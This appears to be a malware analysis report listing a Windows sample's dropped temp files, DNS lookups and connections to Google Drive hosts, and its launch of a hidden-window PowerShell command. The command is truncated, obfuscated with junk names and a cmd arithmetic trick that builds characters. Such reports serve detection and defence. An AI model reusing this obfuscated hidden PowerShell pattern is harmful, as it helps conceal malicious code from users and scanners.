Technical Information
- %TEMP%\ideernes.txt
- %WINDIR%\temp\cab4bb0.tmp
- %WINDIR%\temp\tar4bc1.tmp
- %WINDIR%\temp\cab4d77.tmp
- %WINDIR%\temp\tar4d78.tmp
- %WINDIR%\temp\cab4bb0.tmp
- %WINDIR%\temp\tar4bc1.tmp
- %WINDIR%\temp\cab4d77.tmp
- %WINDIR%\temp\tar4d78.tmp
- 'drive.google.com':443
- 'pk#.goog':80
- 'drive.usercontent.google.com':443
- http://pk#.goog/gsr1/gsr1.crt
- 'drive.google.com':443
- 'drive.usercontent.google.com':443
- DNS ASK drive.google.com
- DNS ASK pk#.goog
- DNS ASK drive.usercontent.google.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' "<#Alfers Skabekrukkens Feather Receivable #>;$Unprofanely=(cmd /c set /A 115^^0);Function Kraniums ([String]$Peltless){$Unprofanely=[char][int]$Unprofanely;$Grasshopperish=$Unprofanely+'ubstri...' (with hidden window)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' "<#Alfers Skabekrukkens Feather Receivable #>;$Unprofanely=(cmd /c set /A 115^^0);Function Kraniums ([String]$Peltless){$Unprofanely=[char][int]$Unprofanely;$Grasshopperish=$Unprofanely+'ubstri...
- '<SYSTEM32>\cmd.exe' /c set /A 115^^0